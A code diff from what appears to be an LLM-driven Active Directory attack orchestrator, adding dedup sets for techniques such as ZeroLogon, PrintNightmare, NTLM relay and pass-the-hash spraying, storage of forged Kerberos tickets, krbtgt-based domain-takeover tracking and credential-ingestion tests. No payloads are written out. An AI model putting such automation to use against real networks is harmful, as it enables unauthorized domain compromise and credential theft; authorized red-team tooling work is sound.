assert!(removed.is_empty()); + } + #[test] fn dedup_sets_are_independent() { let mut state = StateInner::new("op-1".into()); @@ -331,6 +754,41 @@ mod tests { DEDUP_ADCS_EXPLOIT, DEDUP_GPO_ABUSE, DEDUP_LAPS, + DEDUP_NTLM_RELAY, + DEDUP_NOPAC, + DEDUP_ZEROLOGON, + DEDUP_PRINTNIGHTMARE, + DEDUP_MSSQL_COERCION, + DEDUP_PASSWORD_POLICY, + DEDUP_GPP_SYSVOL, + DEDUP_NTLMV1_DOWNGRADE, + DEDUP_LDAP_SIGNING, + DEDUP_WEBDAV_DETECTION, + DEDUP_SPOOLER_CHECK, + DEDUP_MACHINE_ACCOUNT_QUOTA, + DEDUP_DFS_COERCION, + DEDUP_PETITPOTAM_UNAUTH, + DEDUP_WINRM_LATERAL, + DEDUP_GROUP_ENUMERATION, + DEDUP_LOCALUSER_SPRAY, + DEDUP_KRBRELAYUP, + DEDUP_SEARCHCONNECTOR, + DEDUP_LSASSY_DUMP, + DEDUP_RDP_LATERAL, + DEDUP_FOREIGN_GROUP_ENUM, + DEDUP_CERTIPY_AUTH, + DEDUP_SID_ENUMERATION, + DEDUP_DNS_ENUM, + DEDUP_DOMAIN_USER_ENUM, + DEDUP_PTH_SPRAY, + DEDUP_CERTIFRIED, + DEDUP_DACL_ABUSE, + DEDUP_SMBCLIENT_ENUM, + DEDUP_ACL_DISCOVERY, + DEDUP_CROSS_FOREST_ENUM, + DEDUP_CROSS_REALM_LATERAL, + DEDUP_GOLDEN_CERT, + DEDUP_MSSQL_RETRY, ]; assert_eq!(expected.len(), ALL_DEDUP_SETS.len()); for name in expected { @@ -430,6 +888,54 @@ mod tests { assert!(state.all_forests_dominated()); } + #[test] + fn user_quarantine_basic() { + let mut state = StateInner::new("op-1".into()); + assert!(!state.is_user_quarantined("testuser1", "contoso.local")); + + state.quarantine_user("testuser1", "contoso.local"); + assert!(state.is_user_quarantined("testuser1", "contoso.local")); + assert!(state.is_user_quarantined("TESTUSER1", "CONTOSO.LOCAL")); // case insensitive + + // Different user not affected + assert!(!state.is_user_quarantined("testuser2", "contoso.local")); + // Same user, different domain not affected + assert!(!state.is_user_quarantined("testuser1", "fabrikam.local")); + } + + #[test] + fn quarantined_users_in_domain_filters() { + let mut state = StateInner::new("op-1".into()); + state.quarantine_user("testuser1", "contoso.local"); + state.quarantine_user("testuser2", "contoso.local"); + state.quarantine_user("testuser3", "fabrikam.local"); + + let mut contoso = state.quarantined_users_in_domain("contoso.local"); + contoso.sort(); + assert_eq!( + contoso, + vec!["testuser1".to_string(), "testuser2".to_string()] + ); + + let fabrikam = state.quarantined_users_in_domain("fabrikam.local"); + assert_eq!(fabrikam, vec!["testuser3".to_string()]); + + let unknown = state.quarantined_users_in_domain("unknown.local"); + assert!(unknown.is_empty()); + } + + #[test] + fn quarantined_users_in_domain_skips_expired() { + let mut state = StateInner::new("op-1".into()); + state + .quarantined_users + .insert("expired@contoso.local".into(), Utc::now() - chrono::Duration::seconds(1)); + state.quarantine_user("fresh", "contoso.local"); + + let users = state.quarantined_users_in_domain("contoso.local"); + assert_eq!(users, vec!["fresh".to_string()]); + } + #[test] fn credential_quarantine_expired() { let mut state = StateInner::new("op-1".into()); diff --git a/ares-cli/src/orchestrator/state/mod.rs b/ares-cli/src/orchestrator/state/mod.rs index 93b8002d..34e7ee5a 100644 --- a/ares-cli/src/orchestrator/state/mod.rs +++ b/ares-cli/src/orchestrator/state/mod.rs @@ -8,12 +8,15 @@ //! arrive. Dedup sets are persisted to Redis so they survive orchestrator restarts. mod dedup; +pub mod domain_probe; mod inner; mod persistence; mod publishing; mod shared; // Re-export everything that was publicly visible from the old single file. +pub use dedup::MAX_EXPLOIT_FAILURES; +pub use inner::StateInner; pub use shared::SharedState; pub const DEDUP_CRACK_REQUESTS: &str = "crack_requests"; @@ -41,6 +44,44 @@ pub const DEDUP_SHARE_ENUM: &str = "share_enum"; pub const DEDUP_ADCS_EXPLOIT: &str = "adcs_exploit"; pub const DEDUP_GPO_ABUSE: &str = "gpo_abuse"; pub const DEDUP_LAPS: &str = "laps_extract"; +pub const DEDUP_NTLM_RELAY: &str = "ntlm_relay"; +pub const DEDUP_NOPAC: &str = "nopac"; +pub const DEDUP_ZEROLOGON: &str = "zerologon"; +pub const DEDUP_PRINTNIGHTMARE: &str = "printnightmare"; +pub const DEDUP_MSSQL_COERCION: &str = "mssql_coercion"; +pub const DEDUP_PASSWORD_POLICY: &str = "password_policy"; +pub const DEDUP_GPP_SYSVOL: &str = "gpp_sysvol"; +pub const DEDUP_NTLMV1_DOWNGRADE: &str = "ntlmv1_downgrade"; +pub const DEDUP_LDAP_SIGNING: &str = "ldap_signing"; +pub const DEDUP_WEBDAV_DETECTION: &str = "webdav_detection"; +pub const DEDUP_SPOOLER_CHECK: &str = "spooler_check"; +pub const DEDUP_MACHINE_ACCOUNT_QUOTA: &str = "machine_account_quota"; +pub const DEDUP_DFS_COERCION: &str = "dfs_coercion"; +pub const DEDUP_PETITPOTAM_UNAUTH: &str = "petitpotam_unauth"; +pub const DEDUP_WINRM_LATERAL: &str = "winrm_lateral"; +pub const DEDUP_GROUP_ENUMERATION: &str = "group_enumeration"; +pub const DEDUP_LOCALUSER_SPRAY: &str = "localuser_spray"; +pub const DEDUP_KRBRELAYUP: &str = "krbrelayup"; +pub const DEDUP_SEARCHCONNECTOR: &str = "searchconnector"; +pub const DEDUP_LSASSY_DUMP: &str = "lsassy_dump"; +pub const DEDUP_RDP_LATERAL: &str = "rdp_lateral"; +pub const DEDUP_FOREIGN_GROUP_ENUM: &str = "foreign_group_enum"; +pub const DEDUP_CERTIPY_AUTH: &str = "certipy_auth"; +pub const DEDUP_SID_ENUMERATION: &str = "sid_enumeration"; +pub const DEDUP_DNS_ENUM: &str = "dns_enum"; +pub const DEDUP_DOMAIN_USER_ENUM: &str = "domain_user_enum"; +pub const DEDUP_PTH_SPRAY: &str = "pth_spray"; +pub const DEDUP_CERTIFRIED: &str = "certifried"; +pub const DEDUP_DACL_ABUSE: &str = "dacl_abuse"; +pub const DEDUP_SMBCLIENT_ENUM: &str = "smbclient_enum"; +pub const DEDUP_ACL_DISCOVERY: &str = "acl_discovery"; +pub const DEDUP_CROSS_FOREST_ENUM: &str = "cross_forest_enum"; +pub const DEDUP_CROSS_REALM_LATERAL: &str = "cross_realm_lateral"; +pub const DEDUP_GOLDEN_CERT: &str = "golden_cert"; +/// Per-(vuln_id, credential) dedup for re-dispatching MSSQL exploits when +/// a new cred for the vuln's domain becomes available after the initial +/// LLM attempt failed (e.g. cred-timing race in cross-forest pivots). +pub const DEDUP_MSSQL_RETRY: &str = "mssql_retry"; /// Vuln queue ZSET key suffix. pub const KEY_VULN_QUEUE: &str = "vuln_queue"; @@ -74,4 +115,104 @@ const ALL_DEDUP_SETS: &[&str] = &[ DEDUP_ADCS_EXPLOIT, DEDUP_GPO_ABUSE, DEDUP_LAPS, + DEDUP_NTLM_RELAY, + DEDUP_NOPAC, + DEDUP_ZEROLOGON, + DEDUP_PRINTNIGHTMARE, + DEDUP_MSSQL_COERCION, + DEDUP_PASSWORD_POLICY, + DEDUP_GPP_SYSVOL, + DEDUP_NTLMV1_DOWNGRADE, + DEDUP_LDAP_SIGNING, + DEDUP_WEBDAV_DETECTION, + DEDUP_SPOOLER_CHECK, + DEDUP_MACHINE_ACCOUNT_QUOTA, + DEDUP_DFS_COERCION, + DEDUP_PETITPOTAM_UNAUTH, + DEDUP_WINRM_LATERAL, + DEDUP_GROUP_ENUMERATION, + DEDUP_LOCALUSER_SPRAY, + DEDUP_KRBRELAYUP, + DEDUP_SEARCHCONNECTOR, + DEDUP_LSASSY_DUMP, + DEDUP_RDP_LATERAL, + DEDUP_FOREIGN_GROUP_ENUM, + DEDUP_CERTIPY_AUTH, + DEDUP_SID_ENUMERATION, + DEDUP_DNS_ENUM, + DEDUP_DOMAIN_USER_ENUM, + DEDUP_PTH_SPRAY, + DEDUP_CERTIFRIED, + DEDUP_DACL_ABUSE, + DEDUP_SMBCLIENT_ENUM, + DEDUP_ACL_DISCOVERY, + DEDUP_CROSS_FOREST_ENUM, + DEDUP_CROSS_REALM_LATERAL, + DEDUP_GOLDEN_CERT, + DEDUP_MSSQL_RETRY, ]; + +#[cfg(test)] +mod tests { + use super::*; + + #[test] + fn all_dedup_sets_are_unique() { + let mut seen = std::collections::HashSet::new(); + for name in ALL_DEDUP_SETS { + assert!(seen.insert(*name), "Duplicate dedup set name: {name}"); + } + } + + #[test] + fn new_dedup_constants_in_all_dedup_sets() { + let new_constants = [ + DEDUP_NTLM_RELAY, + DEDUP_NOPAC, + DEDUP_ZEROLOGON, + DEDUP_PRINTNIGHTMARE, + DEDUP_MSSQL_COERCION, + DEDUP_PASSWORD_POLICY, + DEDUP_GPP_SYSVOL, + DEDUP_NTLMV1_DOWNGRADE, + DEDUP_LDAP_SIGNING, + DEDUP_WEBDAV_DETECTION, + DEDUP_SPOOLER_CHECK, + DEDUP_MACHINE_ACCOUNT_QUOTA, + DEDUP_DFS_COERCION, + DEDUP_PETITPOTAM_UNAUTH, + DEDUP_WINRM_LATERAL, + DEDUP_GROUP_ENUMERATION, + DEDUP_LOCALUSER_SPRAY, + DEDUP_KRBRELAYUP, + DEDUP_SEARCHCONNECTOR, + DEDUP_LSASSY_DUMP, + DEDUP_RDP_LATERAL, + DEDUP_FOREIGN_GROUP_ENUM, + DEDUP_CERTIPY_AUTH, + DEDUP_SID_ENUMERATION, + DEDUP_DNS_ENUM, + DEDUP_DOMAIN_USER_ENUM, + DEDUP_PTH_SPRAY, + DEDUP_CERTIFRIED, + DEDUP_DACL_ABUSE, + DEDUP_SMBCLIENT_ENUM, + ]; + for c in &new_constants { + assert!( + ALL_DEDUP_SETS.contains(c), + "Dedup constant '{c}' missing from ALL_DEDUP_SETS" + ); + } + } + + #[test] + fn dedup_set_count() { + // Ensure we know how many dedup sets exist (catches accidental omissions) + assert!( + ALL_DEDUP_SETS.len() >= 45, + "Expected at least 45 dedup sets, got {}", + ALL_DEDUP_SETS.len() + ); + } +} diff --git a/ares-cli/src/orchestrator/state/persistence.rs b/ares-cli/src/orchestrator/state/persistence.rs index 2b8753be..1b085941 100644 --- a/ares-cli/src/orchestrator/state/persistence.rs +++ b/ares-cli/src/orchestrator/state/persistence.rs @@ -6,11 +6,12 @@ use anyhow::{Context, Result}; use redis::AsyncCommands; use tracing::{debug, info}; +use ares_core::models::CandidateDomain; use ares_core::state::{self, RedisStateReader}; use redis::aio::ConnectionLike; -use super::{SharedState, ALL_DEDUP_SETS, DEDUP_ACL_STEPS}; +use super::{SharedState, ALL_DEDUP_SETS, DEDUP_ACL_STEPS, DEDUP_TRUST_FOLLOW}; use crate::orchestrator::task_queue::TaskQueueCore; impl SharedState { @@ -41,6 +42,29 @@ impl SharedState { } }; + // Trust workflow dedups (`trust_follow:*` and `trust_extract:*` live in + // the same set) gate "once per op execution" decisions — forge a Kerberos + // ticket for a foreign realm, extract a trust key. They were 24h-TTL'd + // and persisted across orchestrator restarts, which meant any code-change + // requiring a re-fire had to be paired with a manual SREM. Clear them on + // load so a restart re-runs the trust path against the latest code. + let trust_follow_key = format!( + "{}:{}:{}:{}", + state::KEY_PREFIX, + operation_id, + state::KEY_DEDUP_PREFIX, + DEDUP_TRUST_FOLLOW + ); + let prior_members: HashSet = + conn.smembers(&trust_follow_key).await.unwrap_or_default(); + if !prior_members.is_empty() { + let _: redis::RedisResult = conn.del(&trust_follow_key).await; + info!( + cleared = prior_members.len(), + "Cleared trust_follow dedup on op load — trust workflow will re-fire" + ); + } + // Load dedup sets let mut dedup_sets: HashMap> = HashMap::new(); for set_name in ALL_DEDUP_SETS { @@ -103,6 +127,23 @@ impl SharedState { } } + let candidate_domains_key = format!( + "{}:{}:{}", + state::KEY_PREFIX, + operation_id, + state::KEY_CANDIDATE_DOMAINS + ); + let raw_candidates: HashMap = conn + .hgetall(&candidate_domains_key) + .await + .unwrap_or_default(); + let mut candidate_domains = HashMap::new(); + for (fqdn, json_str) in &raw_candidates { + if let Ok(candidate) = serde_json::from_str::(json_str) { + candidate_domains.insert(fqdn.clone(), candidate); + } + } + // Load ACL chains let acl_chains_key = format!( "{}:{}:{}", @@ -163,6 +204,22 @@ impl SharedState { let dispatched_acl_steps: HashSet = conn.smembers(&acl_dedup_key).await.unwrap_or_default(); + // Load forged Kerberos tickets + let kerberos_tickets_key = format!( + "{}:{}:{}", + state::KEY_PREFIX, + operation_id, + state::KEY_KERBEROS_TICKETS + ); + let raw_tickets: HashMap = conn + .hgetall(&kerberos_tickets_key) + .await + .unwrap_or_default(); + let kerberos_tickets: Vec = raw_tickets + .into_values() + .filter_map(|s| serde_json::from_str(&s).ok()) + .collect(); + // Apply to state let mut state = self.inner.write().await; state.target = loaded.target; @@ -180,6 +237,7 @@ impl SharedState { state.domain_sids = domain_sids; state.admin_names = admin_names; state.trusted_domains = trusted_domains; + state.candidate_domains = candidate_domains; // Rebuild dominated_domains from krbtgt hashes state.dominated_domains = state .hashes @@ -210,6 +268,22 @@ impl SharedState { }) .filter(|d| !d.is_empty()) .collect(); + // Mirror rebuilt set to Redis so post-mortem `SCARD` stays consistent + // after orchestrator restart. Source of truth remains the krbtgt + // hashes; this is purely a visibility mirror. + let dominated_snapshot: Vec = state.dominated_domains.iter().cloned().collect(); + if !dominated_snapshot.is_empty() { + let dominated_key = format!( + "{}:{}:{}", + state::KEY_PREFIX, + operation_id, + state::KEY_DOMINATED_DOMAINS + ); + for d in &dominated_snapshot { + let _: redis::RedisResult = conn.sadd(&dominated_key, d).await; + } + let _: redis::RedisResult = conn.expire(&dominated_key, 86400).await; + } state.has_domain_admin = loaded.has_domain_admin; state.has_golden_ticket = loaded.has_golden_ticket; state.domain_admin_path = loaded.domain_admin_path; @@ -219,6 +293,7 @@ impl SharedState { state.dispatched_acl_steps = dispatched_acl_steps; state.pending_tasks = pending_tasks; state.completed_tasks = completed_tasks; + state.kerberos_tickets = kerberos_tickets; let cred_count = state.credentials.len(); let hash_count = state.hashes.len(); @@ -317,6 +392,39 @@ impl SharedState { } } + let candidate_domains_key = format!( + "{}:{}:{}", + state::KEY_PREFIX, + operation_id, + state::KEY_CANDIDATE_DOMAINS + ); + let raw_candidates: HashMap = conn + .hgetall(&candidate_domains_key) + .await + .unwrap_or_default(); + let mut candidate_domains = HashMap::new(); + for (fqdn, json_str) in &raw_candidates { + if let Ok(candidate) = serde_json::from_str::(json_str) { + candidate_domains.insert(fqdn.clone(), candidate); + } + } + + // Refresh Kerberos tickets + let kerberos_tickets_key = format!( + "{}:{}:{}", + state::KEY_PREFIX, + operation_id, + state::KEY_KERBEROS_TICKETS + ); + let raw_tickets: HashMap = conn + .hgetall(&kerberos_tickets_key) + .await + .unwrap_or_default(); + let kerberos_tickets: Vec = raw_tickets + .into_values() + .filter_map(|s| serde_json::from_str(&s).ok()) + .collect(); + let mut state = self.inner.write().await; state.credentials = credentials; state.hashes = hashes; @@ -331,7 +439,9 @@ impl SharedState { state.domain_sids = domain_sids; state.admin_names = admin_names; state.trusted_domains = trusted_domains; + state.candidate_domains = candidate_domains; state.acl_chains = acl_chains; + state.kerberos_tickets = kerberos_tickets; // Rebuild dominated_domains from refreshed hashes state.dominated_domains = state .hashes @@ -412,13 +522,15 @@ mod tests { // Seed meta so exists() returns true, then publish data seed_meta(&q, "op-1").await; + // Publish a DC host so the suffix is promoted authoritatively + // (non-DC FQDN suffixes are now held as candidates, not domains). let host = ares_core::models::Host { ip: "192.168.58.5".to_string(), - hostname: "srv01.contoso.local".to_string(), + hostname: "dc01.contoso.local".to_string(), os: String::new(), roles: vec![], services: vec!["445/tcp".to_string()], - is_dc: false, + is_dc: true, owned: false, }; state.publish_host(&q, host).await.unwrap(); @@ -469,6 +581,83 @@ mod tests { assert!(s.dedup["crack_requests"].contains("hash123")); } + #[tokio::test] + async fn load_from_redis_clears_trust_follow_dedup() { + // trust_follow / trust_extract dedups are "once per op execution" + // decisions. Persisting them across orchestrator restarts blocks + // re-firing the trust workflow after a code change. Confirm load + // clears the set so the workflow runs again on the next tick. + let state = SharedState::new("op-trust".to_string()); + let q = mock_queue(); + seed_meta(&q, "op-trust").await; + + // Other dedup sets must NOT be cleared — only trust_follow. + state + .persist_dedup(&q, "trust_follow", "trust_follow:foreign.local:foreign$") + .await + .unwrap(); + state + .persist_dedup(&q, "trust_follow", "trust_extract:foreign.local") + .await + .unwrap(); + state + .persist_dedup(&q, "crack_requests", "hash-stays") + .await + .unwrap(); + + let state2 = SharedState::new("op-trust".to_string()); + state2.load_from_redis(&q).await.unwrap(); + + let s = state2.inner.read().await; + assert!( + s.dedup + .get("trust_follow") + .map(|set| set.is_empty()) + .unwrap_or(true), + "trust_follow dedup should be cleared on op load" + ); + // Sibling dedup must survive — only trust_follow gets reset. + assert!(s.dedup["crack_requests"].contains("hash-stays")); + + // And the Redis-side set should be deleted too, not just the + // in-memory copy, otherwise SADD-NX checks would still see prior keys. + let mut conn = q.connection(); + let live: HashSet = conn + .smembers("ares:op:op-trust:dedup:trust_follow") + .await + .unwrap(); + assert!(live.is_empty(), "Redis trust_follow set must be empty"); + } + + #[tokio::test] + async fn load_from_redis_restores_candidate_domains() { + let state = SharedState::new("op-candidates".to_string()); + let q = mock_queue(); + + seed_meta(&q, "op-candidates").await; + state + .publish_candidate_domain( + &q, + "transient.example.com", + ares_core::models::DomainEvidence::HostnameInference, + Some("192.168.58.50".to_string()), + ) + .await + .unwrap(); + state + .mark_candidate_probed(&q, "transient.example.com") + .await + .unwrap(); + + let state2 = SharedState::new("op-candidates".to_string()); + state2.load_from_redis(&q).await.unwrap(); + + let s = state2.inner.read().await; + let candidate = s.candidate_domains.get("transient.example.com").unwrap(); + assert!(candidate.probed); + assert_eq!(candidate.source_host_ip.as_deref(), Some("192.168.58.50")); + } + #[tokio::test] async fn refresh_from_redis_updates_state() { let state = SharedState::new("op-1".to_string()); diff --git a/ares-cli/src/orchestrator/state/publishing/credentials.rs b/ares-cli/src/orchestrator/state/publishing/credentials.rs index 5232af9f..20e8b857 100644 --- a/ares-cli/src/orchestrator/state/publishing/credentials.rs +++ b/ares-cli/src/orchestrator/state/publishing/credentials.rs @@ -10,15 +10,18 @@ use redis::aio::ConnectionLike; use crate::orchestrator::state::SharedState; use crate::orchestrator::task_queue::TaskQueueCore; -use super::sanitize_credential; +use super::{credential_source_trust, sanitize_credential, strip_netexec_artifact}; impl SharedState { /// Add a credential to state and Redis (with dedup). /// /// Sanitizes the credential before storage (strips "Password:" prefix, trailing - /// metadata, normalizes domains, rejects noise). When the credential's domain is - /// a valid FQDN (contains a dot), it is automatically added to `state.domains` - /// (matches Python's `add_credential()` behavior). + /// metadata, normalizes domains, rejects noise). The credential's `domain` + /// field is stored as-is on the credential, but is NEVER promoted into the + /// canonical `state.domains` registry — that registry is reserved for + /// authoritative recon (LDAP root DSE, DC enumeration, trust queries) so an + /// LLM-supplied typo like `child.contossso.com` cannot pollute the + /// global view. pub async fn publish_credential( &self, queue: &TaskQueueCore, @@ -34,41 +37,68 @@ impl SharedState { None => return Ok(false), }; + // Reject phantom domain misattribution. Forest-wide LDAP/GC searches, + // SYSVOL script scrapes, and registry autologon dumps can surface a + // (user, password) pair under one realm while a more authoritative + // source already pinned that pair to a different realm. When the + // existing entry comes from a strictly more trustworthy source, treat + // the new entry as a misattribution. Otherwise it pollutes + // find_trust_credential and yields cross-forest LDAP bind 0x52e. + if !cred.password.is_empty() { + let new_trust = credential_source_trust(&cred.source); + let state = self.inner.read().await; + let conflict = state.credentials.iter().find(|c| { + c.username.eq_ignore_ascii_case(&cred.username) + && c.password == cred.password + && !c.domain.eq_ignore_ascii_case(&cred.domain) + }); + if let Some(existing) = conflict { + let existing_trust = credential_source_trust(&existing.source); + if existing_trust > new_trust { + tracing::warn!( + username = %cred.username, + rejected_domain = %cred.domain, + rejected_source = %cred.source, + kept_domain = %existing.domain, + kept_source = %existing.source, + "Rejecting phantom credential — same (user, password) already known under a different domain from a more trusted source" + ); + return Ok(false); + } + } + } + let operation_id = { let state = self.inner.read().await; state.operation_id.clone() }; - let reader = RedisStateReader::new(operation_id.clone()); + let reader = RedisStateReader::new(operation_id); let mut conn = queue.connection(); let added = reader.add_credential(&mut conn, &cred).await?; if added { - // Auto-extract domain from credential (matches Python add_credential) - let cred_domain = cred.domain.to_lowercase(); - if cred_domain.contains('.') { - let mut state = self.inner.write().await; - if !state.domains.contains(&cred_domain) { - state.domains.push(cred_domain.clone()); - let domain_key = format!( - "{}:{}:{}", - state::KEY_PREFIX, - operation_id, - state::KEY_DOMAINS, - ); - let _: Result<(), _> = - redis::AsyncCommands::sadd(&mut conn, &domain_key, &cred_domain).await; - let _: Result<(), _> = - redis::AsyncCommands::expire(&mut conn, &domain_key, 86400i64).await; - tracing::info!( - domain = %cred_domain, - username = %cred.username, - "Auto-extracted domain from credential" - ); - } - state.credentials.push(cred); - } else { - let mut state = self.inner.write().await; - state.credentials.push(cred); + // Warn (don't promote) when the credential's domain is unknown — this + // is how we surface LLM hallucinations without letting them mutate + // canonical state. Use NetExec-artifact-stripped form for the check. + let cred_domain = strip_netexec_artifact(&cred.domain.to_lowercase()).to_string(); + let mut state = self.inner.write().await; + if cred_domain.contains('.') + && !state + .domains + .iter() + .any(|d| d.eq_ignore_ascii_case(&cred_domain)) + && !state + .domain_controllers + .keys() + .any(|d| d.eq_ignore_ascii_case(&cred_domain)) + { + tracing::warn!( + domain = %cred_domain, + username = %cred.username, + source = %cred.source, + "Credential references unknown domain — not promoting to state.domains (authoritative recon required)" + ); } + state.credentials.push(cred); } Ok(added) } @@ -81,19 +111,53 @@ impl SharedState { pub async fn publish_hash( &self, queue: &TaskQueueCore, - hash: Hash, + mut hash: Hash, ) -> Result { use ares_core::models::VulnerabilityInfo; use std::collections::HashMap; + // Canonicalize realm casing. AD realms are case-insensitive; storing them + // mixed-case (`CONTOSO.LOCAL` from secretsdump, `contoso.local` from + // sibling parsers) splits the same identity into two state entries and + // slips past dedup keys built with `format!("{domain}\\{user}")`. + // Mirrors the credential-side fix in `sanitize_credential`. + hash.domain = hash.domain.to_lowercase(); + let operation_id = { let state = self.inner.read().await; state.operation_id.clone() }; + let operation_id_for_redis = operation_id.clone(); let reader = RedisStateReader::new(operation_id); let mut conn = queue.connection(); let added = reader.add_hash(&mut conn, &hash).await?; - if added { + if !added { + // Upsert path: redis dedup rejected the row, but if this hash + // carries an AES256 key and the in-memory entry doesn't, mirror + // the redis upsert performed by add_hash so cross-forest forge + // gets AES on the very next 30s tick (Win2016+ rejects RC4-only + // inter-realm tickets — losing AES to dedup blocks fabrikam compromise). + if hash.aes_key.is_some() { + let mut state = self.inner.write().await; + if let Some(existing) = state.hashes.iter_mut().find(|h| { + h.username.eq_ignore_ascii_case(&hash.username) + && h.domain.eq_ignore_ascii_case(&hash.domain) + && h.hash_type.eq_ignore_ascii_case(&hash.hash_type) + && h.hash_value == hash.hash_value + }) { + if existing.aes_key.is_none() { + existing.aes_key = hash.aes_key.clone(); + tracing::info!( + username = %hash.username, + domain = %hash.domain, + "Upserted AES256 key onto existing in-memory hash entry" + ); + } + } + } + return Ok(false); + } + { let is_krbtgt = hash.username.to_lowercase() == "krbtgt" && hash.hash_type.to_lowercase().contains("ntlm"); let hash_domain = hash.domain.clone(); @@ -115,7 +179,8 @@ impl SharedState { // First pass: find a sibling whose domain matches a known DC let from_dc = state.hashes.iter().find_map(|h| { if h.parent_id.as_deref() == Some(pid) && !h.domain.is_empty() { - let d = h.domain.to_lowercase(); + let d = strip_netexec_artifact(&h.domain.to_lowercase()) + .to_string(); if state.domain_controllers.contains_key(&d) { return Some(d); } @@ -126,7 +191,10 @@ impl SharedState { from_dc.or_else(|| { state.hashes.iter().find_map(|h| { if h.parent_id.as_deref() == Some(pid) && !h.domain.is_empty() { - Some(h.domain.to_lowercase()) + Some( + strip_netexec_artifact(&h.domain.to_lowercase()) + .to_string(), + ) } else { None } @@ -135,18 +203,20 @@ impl SharedState { }) .unwrap_or_default() } else { - hash_domain.to_lowercase() + strip_netexec_artifact(&hash_domain.to_lowercase()).to_string() }; // Only mark as dominated if the domain is a known DC domain. // This prevents false domination claims from misattributed hashes // (e.g. when secretsdump output lacks a domain prefix and sibling // resolution picks up a hash from an unrelated domain). + let mut newly_dominated: Option = None; if !krbtgt_domain.is_empty() && (state.domain_controllers.contains_key(&krbtgt_domain) || state.domains.contains(&krbtgt_domain)) { if state.dominated_domains.insert(krbtgt_domain.clone()) { tracing::info!(domain = %krbtgt_domain, "Domain dominated (krbtgt hash obtained)"); + newly_dominated = Some(krbtgt_domain.clone()); } } else if !krbtgt_domain.is_empty() { tracing::warn!( @@ -164,19 +234,56 @@ impl SharedState { // Auto-set domain admin when first krbtgt NTLM hash arrives (matches Python) if !state.has_domain_admin { + let da_domain = krbtgt_domain.clone(); drop(state); let path = Some("secretsdump → krbtgt NTLM hash".to_string()); - if let Err(e) = self.set_domain_admin(queue, path).await { + if let Err(e) = self.set_domain_admin(queue, path.clone()).await { tracing::warn!(err = %e, "Failed to auto-set domain admin from krbtgt hash"); } else { tracing::info!( "🎯 Domain Admin auto-set from krbtgt NTLM hash in publish_hash" ); + // Emit DA timeline event + let techniques = vec!["T1003.006".to_string(), "T1078.002".to_string()]; + let event_id = + format!("evt-da-{}", &uuid::Uuid::new_v4().simple().to_string()[..8]); + let event = serde_json::json!({ + "id": event_id, + "timestamp": chrono::Utc::now().to_rfc3339(), + "source": "domain_admin", + "description": format!( + "CRITICAL: Domain Admin achieved for {} via {}", + da_domain, + path.as_deref().unwrap_or("krbtgt hash") + ), + "mitre_techniques": techniques, + }); + let _ = self + .persist_timeline_event(queue, &event, &techniques) + .await; } } else { drop(state); } + // Mirror in-memory `dominated_domains` to a Redis SET so + // post-mortem scripts (`SCARD ares:op::dominated_domains`) + // and external dashboards can observe the same view. The + // in-memory set is the source of truth — this is purely a + // visibility mirror. + if let Some(domain) = newly_dominated { + use redis::AsyncCommands; + let key = format!( + "{}:{}:{}", + state::KEY_PREFIX, + operation_id_for_redis, + state::KEY_DOMINATED_DOMAINS + ); + let mut conn = queue.connection(); + let _: redis::RedisResult = conn.sadd(&key, &domain).await; + let _: redis::RedisResult = conn.expire(&key, 86400).await; + } + // Synthesize a dc_secretsdump vulnerability so the discovered // vulnerabilities list reflects the DA achievement path. let vuln_id = format!("dc_secretsdump_{}", krbtgt_domain); @@ -343,15 +450,189 @@ mod tests { } #[tokio::test] - async fn publish_credential_auto_extracts_domain() { + async fn publish_credential_does_not_pollute_state_domains() { + // LLM-supplied domains must never be promoted into the canonical + // `state.domains` registry — otherwise a typo like + // `child.contossso.com` corrupts every downstream tick loop. let state = SharedState::new("op-1".to_string()); let q = mock_queue(); - let cred = make_cred("alice", "P@ssw0rd!", "contoso.local"); + let cred = make_cred("alice", "P@ssw0rd!", "child.contossso.com"); state.publish_credential(&q, cred).await.unwrap(); let s = state.inner.read().await; - assert!(s.domains.contains(&"contoso.local".to_string())); + assert!( + s.domains.is_empty(), + "state.domains must remain untouched by credential ingestion, got {:?}", + s.domains + ); + assert_eq!(s.credentials.len(), 1); + } + + #[tokio::test] + async fn publish_credential_rejects_phantom_description_field_dup() { + // Forest-wide LDAP/GC searches can return a user from one domain while + // the parser's tracked `current_domain` points at another. When that + // happens, a description_field cred is published under the wrong + // domain — same (user, password) but different domain — and pollutes + // find_trust_credential's cross-forest selection. publish_credential + // must reject the phantom so cross-forest auth picks a real principal. + let state = SharedState::new("op-1".to_string()); + let q = mock_queue(); + + let real = Credential { + id: uuid::Uuid::new_v4().to_string(), + username: "alice".to_string(), + password: "Heartsbane".to_string(), + domain: "child.contoso.local".to_string(), + source: "initial".to_string(), + discovered_at: None, + is_admin: false, + parent_id: None, + attack_step: 0, + }; + assert!(state.publish_credential(&q, real).await.unwrap()); + + let phantom = Credential { + id: uuid::Uuid::new_v4().to_string(), + username: "alice".to_string(), + password: "Heartsbane".to_string(), + domain: "contoso.local".to_string(), + source: "description_field".to_string(), + discovered_at: None, + is_admin: false, + parent_id: None, + attack_step: 0, + }; + assert!(!state.publish_credential(&q, phantom).await.unwrap()); + + let s = state.inner.read().await; + assert_eq!(s.credentials.len(), 1); + assert_eq!(s.credentials[0].domain, "child.contoso.local"); + } + + #[tokio::test] + async fn publish_credential_rejects_low_trust_after_high_trust_phantom() { + // Generalization of description_field rejection to all low-trust + // sources. autologon_registry pulled a CHILD user but the surrounding + // line gave a parent-realm prefix (`CONTOSO\bob`). + // secretsdump already pinned the user to child.contoso.local; + // the parent-realm copy must be rejected as a phantom. + let state = SharedState::new("op-1".to_string()); + let q = mock_queue(); + + let real = Credential { + id: uuid::Uuid::new_v4().to_string(), + username: "bob".to_string(), + password: "P@ssw0rd!".to_string(), + domain: "child.contoso.local".to_string(), + source: "secretsdump".to_string(), + discovered_at: None, + is_admin: false, + parent_id: None, + attack_step: 0, + }; + assert!(state.publish_credential(&q, real).await.unwrap()); + + let phantom = Credential { + id: uuid::Uuid::new_v4().to_string(), + username: "bob".to_string(), + password: "P@ssw0rd!".to_string(), + domain: "contoso.local".to_string(), + source: "autologon_registry".to_string(), + discovered_at: None, + is_admin: false, + parent_id: None, + attack_step: 0, + }; + assert!(!state.publish_credential(&q, phantom).await.unwrap()); + + let s = state.inner.read().await; + assert_eq!(s.credentials.len(), 1); + assert_eq!(s.credentials[0].domain, "child.contoso.local"); + } + + #[tokio::test] + async fn publish_credential_high_trust_not_rejected_after_low_trust() { + // Symmetric guard: when the wrong-realm record arrives FIRST from a + // low-trust source, a later HIGH-trust correct-realm record must NOT + // be rejected — the original gate's blanket rejection on any conflict + // was the bug Task #21 was filed against. + 